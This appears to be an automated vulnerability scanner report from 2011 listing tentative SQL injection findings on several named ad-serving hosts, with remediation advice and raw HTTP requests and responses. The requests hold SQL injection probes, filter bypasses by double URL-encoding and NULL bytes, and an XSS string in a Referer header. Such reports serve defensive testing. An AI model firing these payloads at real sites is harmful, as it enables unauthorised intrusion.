SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y'&v=1 HTTP/1.1 Host: 4c28d6.r.axf8.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Length: 3028 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 01:54:17 GMT
<html> <head> <title>Runtime Error</title> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";fon ...[SNIP]...
Request 2
GET /mr/a.gif?a=4C28D6x'%20or%201%3d1%20or%20'x'%3d'y''&v=1 HTTP/1.1 Host: 4c28d6.r.axf8.net Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 14 Content-Type: application/x-javascript; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 01:54:18 GMT
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:'/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
GET /h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http:''/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725? HTTP/1.1 Host: a.tribalfusion.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ANON_ID=a8nCGVw5EABCYAtRiklfg7ZdwC3yDFXRkhhrUF4qg3L3sZaUqOhZaZbriw2WPLmjhHlQa1esZad0jks9r5evcfWCKHXN6ygaUM0hM7TDZbu7CY4wy78PaZbTGPb7eIpCLDkYjrD5aptZb67wPMULu6v0W1mFnjwVDNvC6KyuZagfdstZaTfoaXyMLOAnZcYEC1NoRZdIZdCkh8ZaH4vwDhMYdiklQyrg17ZadsS3pZbJSCH2cH8BxBeWBKpgVWW299pILw1WvixDGuy5ueYZcYcnUZckKvnZaSIBnhGag5uwmFhABpnlSiMcRhCsepIj62LaXCxZaiZcDipNKhuKgsExQ16B9y31RhZbj4XxIdZa6BI4DgsPSRJqN0WkRoGaHZbIyeLiyZcs057ZcPZbZdNCM6JR1QBP6T8Ma5MC8Cjl7ZcaB3V1bUllZbZbTlswMnyRFsDUuQm4LZa5m7ZacKFDP345FH1E7sR42bZcivkJaVgpgZdZcVIRUZbA1cT5anNPmLdKsZbBi7vLvKv5nSwGuSyCLeMix0MAXVCk9yZbtfuewiRpSHJRcMYhyZd5lgYDbkcZdiMJcfFXQjZa15;
The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the sz request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Fri, 28 Jan 2011 17:24:04 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 37394
GET /adj/N3340.trfu/B4938104.54;sz=728x90;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aOmNvBpGrwoHYF2EY93Wmt46ZbZbpF3K0G7QXVn3XG7ynEZbW3FFPWrJDWmv4REnSPGnsQtUO1drrV6nv4GrW0UFZaVmPw4PYcR6bK2Wry1HBZbptAo5mYW3srcTVncWVMgR6JvTt3RTUbP5rAsWE3wWaY8PT3FQUZbvNiKVRq/;ord=1186321869?%2527%2527 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Date: Fri, 28 Jan 2011 17:24:05 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 33336
document.write('');
if(typeof(dartCallbackObjects) == "undefined") var dartCallbackObjects = new Array(); if(typeof(dartCreativeDisplayManagers) == "undefined") var dartCreativeDisplayManagers = ...[SNIP]...
1.4. http://ad.doubleclick.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://ad.doubleclick.net
Path:
/adj/cm.quadbostonherald/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adj/cm.quadbostonherald/?1%2527=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response 1
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 5910 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:13 GMT Expires: Sat, 29 Jan 2011 05:20:13 GMT Connection: close
document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Aug 27 15:34:32 EDT 2010 -->\r\n<script src=\"http://s0.2mdn.net/ ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adj/cm.quadbostonherald/?1%2527%2527=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;
Response 2
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 882 Cache-Control: no-cache Pragma: no-cache Date: Sat, 29 Jan 2011 05:20:13 GMT Expires: Sat, 29 Jan 2011 05:20:13 GMT Connection: close
document.write('');
var fd_clk = 'http://adsfac.us/link.asp?cc=QAN007.310009.0&clk=http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/3/0/%2a/q%3B234940335%3B0-0%3B0%3B27622757%3B255-0/0%3B40265255/402830 ...[SNIP]...
The zs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the zs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /v0/ad?sid=1198099&zs=3732385f3930%00'&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1 Host: ads2.adbrite.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D
Response 1
HTTP/1.1 500 Internal Server Error Server: Apache-Coyote/1.1 Cache-Control: no-cache, no-store, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Content-Type: text/html;charset=utf-8 Content-Length: 1000 Date: Sat, 29 Jan 2011 01:56:24 GMT Connection: close
GET /v0/ad?sid=1198099&zs=3732385f3930%00''&ifr=2&ref=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome&zx=0&zy=0&ww=0&wh=0&fl=1 HTTP/1.1 Host: ads2.adbrite.com Proxy-Connection: keep-alive Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=951;c=2;s=2;d=14;w=728;h=90;$=burst728x90 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: Apache=168362173x0.688+1294536261x899753879; cv=1%3Aq1ZyLi0uyc91zUtWslIySyktr0nPLLDMMi8zrjGwMswuNjMusjK0MlCqBQA%3D; ut=1%3Aq1YqM1KyqlbKTq0szy9KKVayUsotTzQprDHMLja3sKwxrTE0z9dJzsiwSC%2BoysmrMczJSS%2BqqjGsMYAJZuUgCSrpKCUl5uWlFmWCjVKqrQUA; vsd="0@1@4d430048@searchportal.information.com"; rb="0:712156:20822400:6ch47d7o8wtv:0:742697:20828160:3011330574290390485:0:753292:20858400:CA-00000000456885722:0:762701:20861280:D8DB51BF08484217F5D14AB47F4002AD:0:806205:20861280:21d8e954-2b06-11e0-8e8a-0025900870d2:0"; srh=1%3Aq64FAA%3D%3D
Response 2
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-cache, no-store, must-revalidate Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC" Set-Cookie: b=%3A%3Apogj; Domain=.adbrite.com; Expires=Sun, 29-Jan-2012 01:56:25 GMT; Path=/ Set-Cookie: geo=1%3ADchLDoMwDEXRvXhcJMcKVGEKrCDtAhK7IAYFxKcDEHvvm1wd3Yt%2BjuqLznGhmoSZXYEK04P2E6uLL9C%2BCS6dg3U%2B4HcE12EC2wbcxgHs2UJ%2BZp9LCxJUVFPyqTLr9VOJ93Tffw%3D%3D; Domain=.adbrite.com; Expires=Sat, 05-Feb-2011 01:56:25 GMT; Path=/ Set-Cookie: vsd="0@1@4d4373c9@d3.zedo.com"; Version=1; Domain=.adbrite.com; Max-Age=172800; Path=/ Content-Type: application/x-javascript Date: Sat, 29 Jan 2011 01:56:25 GMT Connection: close Content-Length: 376
document.writeln("<script language=\"JavaScript\">"); document.writeln("var zflag_nid=\"951\"; var zflag_cid=\"2\"; var zflag_sid=\"2\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zflag_sz= ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /adscgen/st.php%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response 1
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 05:20:55 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adscgen/st.php%2527%2527?survey_num=774810&site=59003407&code=38567227&randnum=1146873\ HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 29 Jan 2011 05:20:55 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 218 Keep-Alive: timeout=120, max=893 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adscgen/st.php%27%27 was not found on this server.</ ...[SNIP]...
1.7. http://amch.questionmarket.com/adscgen/st.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://amch.questionmarket.com
Path:
/adscgen/st.php
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adscgen/st.php/1%00' HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response 1
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:44:08 GMT Server: Apache Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=120 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1059
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... <dd> If you think this is a server error, please contact the <a href="mailto:serveradmin@dynamiclogic.com"> ...[SNIP]...
Request 2
GET /adscgen/st.php/1%00'' HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1; LP=1296062048;
Response 2
HTTP/1.1 404 Not Found Date: Fri, 28 Jan 2011 16:44:08 GMT Server: Apache-AdvancedExtranetServer/2.0.50 Content-Length: 214 Keep-Alive: timeout=120, max=888 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adscgen/st.php/1 was not found on this server.</p> < ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /static'%20and%201%3d1--%20/rtb/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;
Response 1
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 326 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Fri, 28 Jan 2011 16:44:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static' and 1=1-- /rtb/sync-min.html/ was not found ...[SNIP]... </p> <hr> <address>Apache/2.2.3 (Red Hat) Server at assets.rubiconproject.com Port 80</address> </body></html>
Request 2
GET /static'%20and%201%3d2--%20/rtb/sync-min.html/ HTTP/1.1 Host: assets.rubiconproject.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: put_1902=CfTKz1vxnM4Qo87LXqXVyg71y5oQqc-aCvFBOBEd; lm="26 Jan 2011 20:13:41 GMT"; pup_w55c=1296073239463; put_1185=3011330574290390485; khaos=GIPAEQ2D-C-IOYY; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; pup_1994=1296072492983; ruid=154d290e46adc1d6f373dd09^5^1296224069^2915161843; rpb=4214%3D1%264894%3D1%264939%3D1%265671%3D1%262399%3D1%263615%3D1%264940%3D1%262372%3D1%263169%3D1%262200%3D1%262374%3D1%265574%3D1%264210%3D1%264212%3D1; rdk=5804/7477; csi2=3159497.js^1^1296073176^1296073176&3138557.js^1^1296072462^1296072462; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; put_2081=CA-00000000456885722; csi15=3173813.js^1^1296073209^1296073209&3180301.js^1^1296073207^1296073207; put_1986=4760492999213801733; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=7477^1; put_1994=6ch47d7o8wtv; cd=false;
Response 2
HTTP/1.1 404 Not Found Server: Apache/2.2.3 (Red Hat) Content-Length: 235 _onnection: close Content-Type: text/html; charset=iso-8859-1 Date: Fri, 28 Jan 2011 16:44:21 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /static' and 1=2-- /rtb/sync-min.html/ was not found ...[SNIP]... </p> </body></html>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 32712709'%20or%201%3d1--%20 and 32712709'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
